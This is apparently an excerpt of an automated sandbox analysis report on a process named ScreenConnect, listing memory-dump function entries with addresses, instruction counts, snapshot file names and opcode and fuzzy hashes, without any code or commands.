                                                                                                              • Opcode ID: 94f61782916d6ecd650fc13e9e274c42af33700bb5f637704e661c6d3ffcaecc
                                                                                                              • Instruction ID: a2c1e3dd2abbb3a16242cc44d23ac6c2b7d27323b940f23da702dee2b3c4ce8e
                                                                                                              • Opcode Fuzzy Hash: 94f61782916d6ecd650fc13e9e274c42af33700bb5f637704e661c6d3ffcaecc
                                                                                                              • Instruction Fuzzy Hash: C4414735B00616CFCB14DF59C4849AABBF2FF89314B25CAA9E559DB261D730F805CB84
                                                                                                              Function 048DB6C8 Relevance: .1, Instructions: 109COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b56ccebf0e5b85b28b5f83dd6593bfb6325d7c43c1c283c90bfffe29d3618c48
                                                                                                              • Instruction ID: d4e07243e63397ce1246753c32672e1d7df99d035808d7b1d432ad4be07b6250
                                                                                                              • Opcode Fuzzy Hash: b56ccebf0e5b85b28b5f83dd6593bfb6325d7c43c1c283c90bfffe29d3618c48
                                                                                                              • Instruction Fuzzy Hash: F241B975805258EFDB01CFA9D890ADEBBF0EF49310F05809AE954AB251DB31A805CFA5
                                                                                                              Function 03704720 Relevance: .1, Instructions: 106COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a6aa57ab74625b7a51dad2276a3228418773f60c5a1dd86e39b56a3b4894ab83
                                                                                                              • Instruction ID: 718a6745b8f6b5d2fa12b5cde5cdd2b2615aac60ea7240c7c4d8548911338b78
                                                                                                              • Opcode Fuzzy Hash: a6aa57ab74625b7a51dad2276a3228418773f60c5a1dd86e39b56a3b4894ab83
                                                                                                              • Instruction Fuzzy Hash: 9F315E34B00209CFEB14EBA9D494AAEF7FAEFC9610B10856AD509D7354DF34ED008B90
                                                                                                              Function 048D4CDD Relevance: .1, Instructions: 101COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3758b6b89150d0bb9d37a73e01fab3a73a333fc4838f801b066bcf843ce6fb18
                                                                                                              • Instruction ID: 77ab6cf012709914997b81574e9995796334326f3598b2c471fba831a7772d74
                                                                                                              • Opcode Fuzzy Hash: 3758b6b89150d0bb9d37a73e01fab3a73a333fc4838f801b066bcf843ce6fb18
                                                                                                              • Instruction Fuzzy Hash: 51411834A02218DFDB64DF65D998AACB7B2BF45715F2007A9E516DB3A4DB34AD80CF00
                                                                                                              Function 03707398 Relevance: .1, Instructions: 99COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a3dd28137ac223489804de1a07e3e7e98eebb10a4d0a89a8fcefff4409ab15d9
                                                                                                              • Instruction ID: 870001ca221618447c89a36e636927668d131472a30449c1a383c4e37d51843d
                                                                                                              • Opcode Fuzzy Hash: a3dd28137ac223489804de1a07e3e7e98eebb10a4d0a89a8fcefff4409ab15d9
                                                                                                              • Instruction Fuzzy Hash: 67412A38700646CFCB15DF79D59891ABBF2EF8931071989A9E51A8B3A1DB31EC04CB50
                                                                                                              Function 037073A8 Relevance: .1, Instructions: 95COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e45c15219d2c2de4e800577ef5d454259a74d8fa903b098e1c93fd72b50cf157
                                                                                                              • Instruction ID: 3db80e7a30f20e558c17ba6a0f92660b4f5e2991f9353bab44d7dc097a08de8f
                                                                                                              • Opcode Fuzzy Hash: e45c15219d2c2de4e800577ef5d454259a74d8fa903b098e1c93fd72b50cf157
                                                                                                              • Instruction Fuzzy Hash: F6311B38700606CFCB14DF68D598D1ABBF2FF8831071989A8E51A8B365DB31EC04CB90
                                                                                                              Function 048DBC08 Relevance: .1, Instructions: 94COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 98643a418876797207adea2768ad0d5bb0b47e9c18c40ead077c1a3098313f20
                                                                                                              • Instruction ID: 089a554bc649501c2a5a21a6f407eee793e6323f965c301718ab3c5c3a165665
                                                                                                              • Opcode Fuzzy Hash: 98643a418876797207adea2768ad0d5bb0b47e9c18c40ead077c1a3098313f20
                                                                                                              • Instruction Fuzzy Hash: 24319E34600205CFDB18CF28D8D4A6A7BB5FF89324B054698D911DF3A9DB30F851CBA0
                                                                                                              Function 048D3855 Relevance: .1, Instructions: 94COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a35bc9cb6b9b69a0f8c181435fbf8ca1e21a1efe93b2dd7a116ace29c3cfe57e
                                                                                                              • Instruction ID: 33a456af34a256be10b47abe8a62c7d53edb26d6de33e0eeb0936668d223eade
                                                                                                              • Opcode Fuzzy Hash: a35bc9cb6b9b69a0f8c181435fbf8ca1e21a1efe93b2dd7a116ace29c3cfe57e
                                                                                                              • Instruction Fuzzy Hash: EF414974A01209CFDB14DFA8C594A9DBBF2AF48304F148669E805EB361CB74ED44CF61
                                                                                                              Function 03704B38 Relevance: .1, Instructions: 92COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 50d6fcd8fe1372d78ed362b87824f43f9dd8e8dab189e1e9de9a9440b748fad8
                                                                                                              • Instruction ID: 4c7b4f488610de6b54fb7fa4f4ce585dd23821e0c8f6b4765433db8d97d35816
                                                                                                              • Opcode Fuzzy Hash: 50d6fcd8fe1372d78ed362b87824f43f9dd8e8dab189e1e9de9a9440b748fad8
                                                                                                              • Instruction Fuzzy Hash: 9931C630600B05CBC734DF7AD858A6BBBF5AF84711B144A2CD666C76E0DB70A989CF90
                                                                                                              Function 03700AD0 Relevance: .1, Instructions: 88COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9b7dc9baa1e4ccae01bb240a9e9d7dbe6436a69e40e6f76da9e42be7c54c7669
                                                                                                              • Instruction ID: b2cd0ae0b8a55c851ee5704c2a5d156898ed00eda85b504e8243a20768b1d6f9
                                                                                                              • Opcode Fuzzy Hash: 9b7dc9baa1e4ccae01bb240a9e9d7dbe6436a69e40e6f76da9e42be7c54c7669
                                                                                                              • Instruction Fuzzy Hash: A2314BB0D0120ACFCB54DFA8C955BADBBF0BB05328F28869AD424E73D1D77086428F91
                                                                                                              Function 037071B1 Relevance: .1, Instructions: 88COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1fede55bb8c7a417702c6985e74d3cabb96b93667513624fcf7f49d1beb069de
                                                                                                              • Instruction ID: a071f3987724d0fd5b8822510772745f6d475104a6897d8dc5c21a12a3719ba4
                                                                                                              • Opcode Fuzzy Hash: 1fede55bb8c7a417702c6985e74d3cabb96b93667513624fcf7f49d1beb069de
                                                                                                              • Instruction Fuzzy Hash: A921B0353082808FC316CB69D89596ABBF6DFD671031944EEE559CB3E2CA61EC058B91
                                                                                                              Function 048D2580 Relevance: .1, Instructions: 85COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 09a0206d732f26672fefae59217184926e7ad97a8bf1a7791730e538a7eec038
                                                                                                              • Instruction ID: 445740aaf2f4eca2b5f0f23bd665ba68ff29f1a40599a4af1cbdfed5bb0708c0
                                                                                                              • Opcode Fuzzy Hash: 09a0206d732f26672fefae59217184926e7ad97a8bf1a7791730e538a7eec038
                                                                                                              • Instruction Fuzzy Hash: 8921A8307093018FFF11AF789994A6EBBF5AF85604B0489AAE505DF355EF34EC0587A1
                                                                                                              Function 048D5AE0 Relevance: .1, Instructions: 81COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ea7e13407dd748e5b578ca2c6e1966c59e4c1ccba3b0acadb1fd177f32055544
                                                                                                              • Instruction ID: 0f9df7238dde2c938bc71a7619d4b3d41b9f0823a081bf83472d10563e768f73
                                                                                                              • Opcode Fuzzy Hash: ea7e13407dd748e5b578ca2c6e1966c59e4c1ccba3b0acadb1fd177f32055544
                                                                                                              • Instruction Fuzzy Hash: B7315031E0160ADBDB10DF99D4146AEBBB2EF84311F154A2AD506A7250EBB06586CF81
                                                                                                              Function 0074D670 Relevance: .1, Instructions: 75COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4009579757.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_74d000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5443d03e637e28bc0c3de3c5b9bd35c9ff760e4ff9412ce077dce6bfbd9b8b5e
                                                                                                              • Instruction ID: 0a57812b73707419d8cfe47044a6d5e27fba6e9ea686266870da3c2bd3b15b0b
                                                                                                              • Opcode Fuzzy Hash: 5443d03e637e28bc0c3de3c5b9bd35c9ff760e4ff9412ce077dce6bfbd9b8b5e
                                                                                                              • Instruction Fuzzy Hash: 052167B6500240DFDB22DF14D9C0F16BF65FB88310F2481ACE9490B246C33ADC06CBA2
                                                                                                              Function 048D5C90 Relevance: .1, Instructions: 74COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c95418d706f635c78851f29e4b2cb2c7d6a0124a094f1f8402d36d80df3bedc7
                                                                                                              • Instruction ID: 556f08e775040d30ad1a65073c2e4d815317014d91e002624dde471c13697209
                                                                                                              • Opcode Fuzzy Hash: c95418d706f635c78851f29e4b2cb2c7d6a0124a094f1f8402d36d80df3bedc7
                                                                                                              • Instruction Fuzzy Hash: 023171306012059FCF18DF68E8C9A5B7B71EF44324F10466AE816DF2E5EB70E991CB91
                                                                                                              Function 048DB6AC Relevance: .1, Instructions: 74COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 367995f64cff30e628ca24943973d0836b997897c9a8f630b7120dddb665df8b
                                                                                                              • Instruction ID: 5188b9d59bdbc9dd177b3fba698a59cd48a183ebcd9c69513ec62af8bf9db8c8
                                                                                                              • Opcode Fuzzy Hash: 367995f64cff30e628ca24943973d0836b997897c9a8f630b7120dddb665df8b
                                                                                                              • Instruction Fuzzy Hash: FB3100B690020DAFCF14CF9AD884ADEBBF5EB48310F11842AE919A7310D775A915CFA1
                                                                                                              Function 048D8831 Relevance: .1, Instructions: 73COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fda27b698c26706cf0f71965dc03c6f724dc5fed2cec1151a20a66925b9938d2
                                                                                                              • Instruction ID: c1eb28fa4596dc76e931fa0f2ebd1ac43e127987b6dd3d2cae89fc2943fbc1e0
                                                                                                              • Opcode Fuzzy Hash: fda27b698c26706cf0f71965dc03c6f724dc5fed2cec1151a20a66925b9938d2
                                                                                                              • Instruction Fuzzy Hash: E431C374A11218DFCB15DB68D854AADB7F6FF89211F5485A9E409E7320EB32AE81CF40
                                                                                                              Function 048D9AA8 Relevance: .1, Instructions: 73COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c9ab74cedc1b19278dc4a735b2a24e4c8ce0dac357d786221d7071c74ea7a253
                                                                                                              • Instruction ID: 1b2ac9ebae066c77f62d5ab7072c6e8d5a106f907520c71ffd5296a4efb9c9ea
                                                                                                              • Opcode Fuzzy Hash: c9ab74cedc1b19278dc4a735b2a24e4c8ce0dac357d786221d7071c74ea7a253
                                                                                                              • Instruction Fuzzy Hash: 75217C70B012198FDB10DF59C898AAEBBF6EF89354F154969D40AEB350DBB1ED01CB90
                                                                                                              Function 048DAE0B Relevance: .1, Instructions: 71COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cbe3fbdb62205db02d09a8c14ab93c301b1b3deb534d69d51a6e634455d83113
                                                                                                              • Instruction ID: d6c9916c8a726bd145d0607f2d7f47e9e7f437f2e773595253fda402c193296b
                                                                                                              • Opcode Fuzzy Hash: cbe3fbdb62205db02d09a8c14ab93c301b1b3deb534d69d51a6e634455d83113
                                                                                                              • Instruction Fuzzy Hash: 69115936F062858FCF189B7A88905BEBBB1EFC5344B0989BAD558C7252E9785804C7A1
                                                                                                              Function 048DBEE8 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7bbd61072a84c01f00c6853cd8bfde47350ee39f92584460df92a684c75ac4ab
                                                                                                              • Instruction ID: 658a3abd86cb94ac3f6745e644efa0cdab97d1c5028cb9b9bad840591c25c1b9
                                                                                                              • Opcode Fuzzy Hash: 7bbd61072a84c01f00c6853cd8bfde47350ee39f92584460df92a684c75ac4ab
                                                                                                              • Instruction Fuzzy Hash: EE3100B6900209AFCF14CF99D884ACEBBF5FB48310F11851AE919A7310C735A955CFA0
                                                                                                              Function 037068A0 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ff7978cd9de64d0e355dd570400a7e95f8326cdaf09c69d798edb9b5afbeca7d
                                                                                                              • Instruction ID: 2b36c771dbc67ad390950b49460ae9f99eb1fb3271f8f767a088a3bae55e902e
                                                                                                              • Opcode Fuzzy Hash: ff7978cd9de64d0e355dd570400a7e95f8326cdaf09c69d798edb9b5afbeca7d
                                                                                                              • Instruction Fuzzy Hash: 4D21FA35A10219CFDB24DBA8D568AEDBBF2FF89710F054069D145AB3A0DB74AC44CB90
                                                                                                              Function 048D9A98 Relevance: .1, Instructions: 69COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9ee37a598af6eb03032d282385660dbe23b8294ed490f9589a5aae0da353479d
                                                                                                              • Instruction ID: 39648d5e728d62e43bc1e15fef2bdd6e4596305651c26e922c19ae4164c24034
                                                                                                              • Opcode Fuzzy Hash: 9ee37a598af6eb03032d282385660dbe23b8294ed490f9589a5aae0da353479d
                                                                                                              • Instruction Fuzzy Hash: 2D2137707012158FDB14DF59C454AAEFBF6AF89350F159869E406EB360DBB1EC01CB80
                                                                                                              Function 03703648 Relevance: .1, Instructions: 68COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1dbcb7ead2c28f84c9676bdb5d60a532c84ca1a80beb3306b735b6e2166544e3
                                                                                                              • Instruction ID: 0af6cdd2eb6a5c777d4736686d2f411a8eb17ae371f7d3ad088e5e02f4d4cdb7
                                                                                                              • Opcode Fuzzy Hash: 1dbcb7ead2c28f84c9676bdb5d60a532c84ca1a80beb3306b735b6e2166544e3
                                                                                                              • Instruction Fuzzy Hash: 1B21D830601206EFE715EB28D859B6DBBB6FF81310F14866DE5094B396CBB16D09C7D0
                                                                                                              Function 03700C21 Relevance: .1, Instructions: 67COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: efeefd9acd803807773335086991ec3c5dbd3e38ead8d1df9d9e630e1e58bdc9
                                                                                                              • Instruction ID: 79e7cd5569f2f16188bf965c4437a2df6c4c95b5d1189acaa04c230ca6124bf2
                                                                                                              • Opcode Fuzzy Hash: efeefd9acd803807773335086991ec3c5dbd3e38ead8d1df9d9e630e1e58bdc9
                                                                                                              • Instruction Fuzzy Hash: C9213832D10B0A9ECB01EFB9D8506EAF7B4EF99210F10C66AD558B7111FB70A295CB81
                                                                                                              Function 048DB0C0 Relevance: .1, Instructions: 66COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 33067f5b9d3d778afaf73045903327dfb545b88492c4cda045f649fe2a69e5e8
                                                                                                              • Instruction ID: 67d2c6654a8c2a4c6ea6a433ecf0784be2c4a9a1def7e48b9e33d57a68d7d081
                                                                                                              • Opcode Fuzzy Hash: 33067f5b9d3d778afaf73045903327dfb545b88492c4cda045f649fe2a69e5e8
                                                                                                              • Instruction Fuzzy Hash: 11213D31601215DFCF14EF58C590A99BBB2FF48310F568A69D845AB359DB32FC41CB94
                                                                                                              Function 048DF3E1 Relevance: .1, Instructions: 66COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fca0536bb89a3fe4b8e5699ef641a01f7d7f5cfd6760c0750c3031fbdcfd621b
                                                                                                              • Instruction ID: 275c0653e4bd441e13048f82b6fb165f403501af87e2864965058940aba0b8c3
                                                                                                              • Opcode Fuzzy Hash: fca0536bb89a3fe4b8e5699ef641a01f7d7f5cfd6760c0750c3031fbdcfd621b
                                                                                                              • Instruction Fuzzy Hash: 592165B5800349CFCB10CF99D4406EEBBF0FF48320F11846AD558A7250D738A909CFA2
                                                                                                              Function 03701730 Relevance: .1, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0bab33ad453e62fec9685968a269978f079651fe57d000933acbcca30ba36238
                                                                                                              • Instruction ID: b8f0f80ca681f1f4ca1e58e0fa82c21fa5553ab8edce7520b0f7e7d9b1388503
                                                                                                              • Opcode Fuzzy Hash: 0bab33ad453e62fec9685968a269978f079651fe57d000933acbcca30ba36238
                                                                                                              • Instruction Fuzzy Hash: 6E21347680024ADFCF10CFAAD885ADEBBF1FB88310F188519E918A7250D339A555CFA1
                                                                                                              Function 03703E63 Relevance: .1, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0fd355d4cce26d9c1c94b1b129aa24abb2cd103287fc570d2374f317f5813cd1
                                                                                                              • Instruction ID: 9ce1a0f370e285fe1b53d52b5bfb5f6fbad1e4b88e230ecb7c920cced649849f
                                                                                                              • Opcode Fuzzy Hash: 0fd355d4cce26d9c1c94b1b129aa24abb2cd103287fc570d2374f317f5813cd1
                                                                                                              • Instruction Fuzzy Hash: C8216878A0010ADFDB04EFB4D865AAEBBF1FF85301B148969D506A7356DB306D12CF90
                                                                                                              Function 048D6DE8 Relevance: .1, Instructions: 64COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 31a2dfa58fea121d3514214ac33f5315f9594ade3ccdcd3fbfa9f53eee6734bf
                                                                                                              • Instruction ID: 7930c0b01746437c2121dc6cf850f3be7080247ae1b79495d8abb149dbc3de6f
                                                                                                              • Opcode Fuzzy Hash: 31a2dfa58fea121d3514214ac33f5315f9594ade3ccdcd3fbfa9f53eee6734bf
                                                                                                              • Instruction Fuzzy Hash: 9C116D32E10B1E99CB10AAB9D8505EEF774EF95350F10CB2AE955B7110FB70A69587C0
                                                                                                              Function 048DACE0 Relevance: .1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6e676e7a76841b268f75849b43ebb79ad5a7951735ba2d801e4db84deca1c4d8
                                                                                                              • Instruction ID: a91873896e083268623e80b64e9d5116b710fb7d98289ac017898965cc98daf7
                                                                                                              • Opcode Fuzzy Hash: 6e676e7a76841b268f75849b43ebb79ad5a7951735ba2d801e4db84deca1c4d8
